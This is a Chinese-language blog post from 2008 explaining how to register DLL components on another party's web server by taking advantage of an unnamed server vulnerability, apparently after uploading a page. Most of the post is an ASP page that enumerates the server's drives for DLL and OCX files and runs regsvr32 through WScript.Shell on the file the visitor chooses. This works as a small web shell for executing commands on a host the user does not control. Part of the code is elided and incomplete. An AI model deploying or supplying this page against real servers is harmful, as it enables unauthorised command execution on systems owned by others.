利用对方服务器漏洞远程注册DLL

利用对方服务器漏洞远程注册DLL
我和朋友一起下载了一个相同的组件,苦于无法注册而没用,但最近我发现他在使用这个组件,显然是已经注册了,好奇怪,他是怎么注册的呢?我问他他不说。

其实,我们在ASP中,是有捷径远程注册DLL的,但需要对方服务器漏洞的“配合”(什么漏洞?我可什么都没说啊,自己看)。试试下面的代码,或许侥幸成功呢:
<% Response.Buffer = True %>
<% Server.ScriptTimeout = 500
Dim frmFolderPath, frmFilePath

frmFolderPath = Request.Form("frmFolderPath")
frmFilePath = Request.Form("frmDllPath")
frmMethod = Request.Form("frmMethod")
btnREG = Request.Form("btnREG")
%>

<HTML>
<HEAD>
   <TITLE>精彩春风之远程注册DLL</TITLE>
   <STYLE TYPE="TEXT/CSS">
   .Legend {FONT-FAMILY: veranda; FONT-SIZE: 14px; FONT-WEIGHT: bold; COLOR: blue}
   .FS {FONT-FAMILY: veranda; FONT-SIZE: 12px; BORDER-WIDTH: 4px; BORDER-COLOR: green;
     MARGIN-LEFT:2px; MARGIN-RIGHT:2px}
   TD {MARGIN-LEFT:6px; MARGIN-RIGHT:6px; PADDING-LEFT:12px; PADDING-RIGHT:12px}
   </STYLE>
</HEAD>

<BODY>
<FORM NAME="regForm" METHOD="POST">
<TABLE BORDER=0 CELLSPACING=6 CELLPADDING=6 MARGINWIDTH=6>
<TR>
   <TD VALIGN=TOP>
   <FIELDSET ID=FS1 NAME=FS1 CLASS=FS>
   <LEGEND CLASS=Legend>注册DLL</LEGEND>
   敲入到DLL目录的路径

   <INPUT TYPE=TEXT NAME="frmFolderPath" VALUE="<%=frmFolderPath%>">

   <INPUT TYPE=SUBMIT NAME=btnFileList VALUE="创建文件列表">

<%
IF Request.Form("btnFileList") <> "" OR btnREG <> "" Then
     Set RegisterFiles = New clsRegister
       RegisterFiles.EchoB("Select File")
       Call RegisterFiles.init(frmFolderPath)
       RegisterFiles.EchoB("
<INPUT TYPE=SUBMIT NAME=btnREG VALUE=" & Chr(34) _
& "REG/UNREG" & Chr(34) & ">")
     IF Request.Form("btnREG") <> "" Then
       Call RegisterFiles.Register(frmFilePath, frmMethod)
     End IF
     Set RegisterFiles = Nothing
   End IF
%>
   </FIELDSET>
   </TD>
</TR>
</TABLE>
</FORM>
</BODY>
</HTML>
<%
Class clsRegister

Private m_oFS

Public Property Let oFS(objOFS)
m_oFS = objOFS
End Property
……
Sub init(strRoot) 'Root to Search (c:, d:, e:)
Dim oDrive, oRootDir
IF oFS.FolderExists(strRoot) Then
IF Len(strRoot) < 3 Then 'Must Be a Drive
Set oDrive = oFS.GetDrive(strRoot)
Set oRootDir = oDrive.RootFolder
Else
Set oRootDir = oFS.GetFolder(strRoot)
End IF
Else
EchoB("噢,文件夹( " & strRoot & " )没找到!")
       Exit Sub
     End IF
     setRoot = oRootDir
     
     Echo("<SELECT NAME=" & Chr(34) & "frmDllPath" & Chr(34) & ">")
       Call getAllDlls(oRootDir)
     EchoB("</SELECT>")
     BuildOptions
   End Sub
   
   Sub getAllDlls(oParentFolder)
   Dim oSubFolders, oFile, oFiles
     Set oSubFolders = oParentFolder.SubFolders
     Set opFiles = oParentFolder.Files
     
     For Each oFile in opFiles
       IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then
         Echo("<OPTION VALUE=" & Chr(34) & oFile.Path & Chr(34) & ">" _
         & oFile.Name & "</Option>")
       End IF
     Next
     
     On Error Resume Next
     For Each oFolder In oSubFolders 'Iterate All Folders in Drive
       Set oFiles = oFolder.Files
       For Each oFile in oFiles
         IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then
           Echo("<OPTION VALUE=" & Chr(34) & oFile.Path & Chr(34) & ">" _
           & oFile.Name & "</Option>")
         End IF
       Next
       Call getAllDlls(oFolder)
     Next
     On Error GoTo 0
   End Sub

   Sub Register(strFilePath, regMethod)
   Dim theFile, strFile, oShell, exitcode
     Set theFile = oFS.GetFile(strFilePath)
     strFile = theFile.Path

     Set oShell = CreateObject ("WScript.Shell")

     IF regMethod = "REG" Then 'Register
       oShell.Run "c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False
       exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False)
        EchoB("regsvr32.exe exitcode = " & exitcode)
     Else 'unRegister
       oShell.Run "c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False
       exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False)
        EchoB("regsvr32.exe exitcode = " & exitcode)
     End IF
     
     Cleanup oShell
   End Sub
   
   Sub BuildOptions
     EchoB("Register: <INPUT TYPE=RADIO NAME=frmMethod VALUE=REG CHECKED>")
     EchoB("unRegister: <INPUT TYPE=RADIO NAME=frmMethod VALUE=UNREG>")
   End Sub
   
   Function Echo(str)
     Echo = Response.Write(str & vbCrLf)
   End Function
   
   Function EchoB(str)
     EchoB = Response.Write(str & "
" & vbCrLf)
   End Function
   
   Sub Cleanup(obj)
     If isObject(obj) Then
       Set obj = Nothing
     End IF
   End Sub
   
   Sub Class_Terminate()
     Cleanup oFS
   End Sub
End Class
%>
posted on 2008-10-16 08:33  jannock  阅读(488)  评论(0编辑  收藏  举报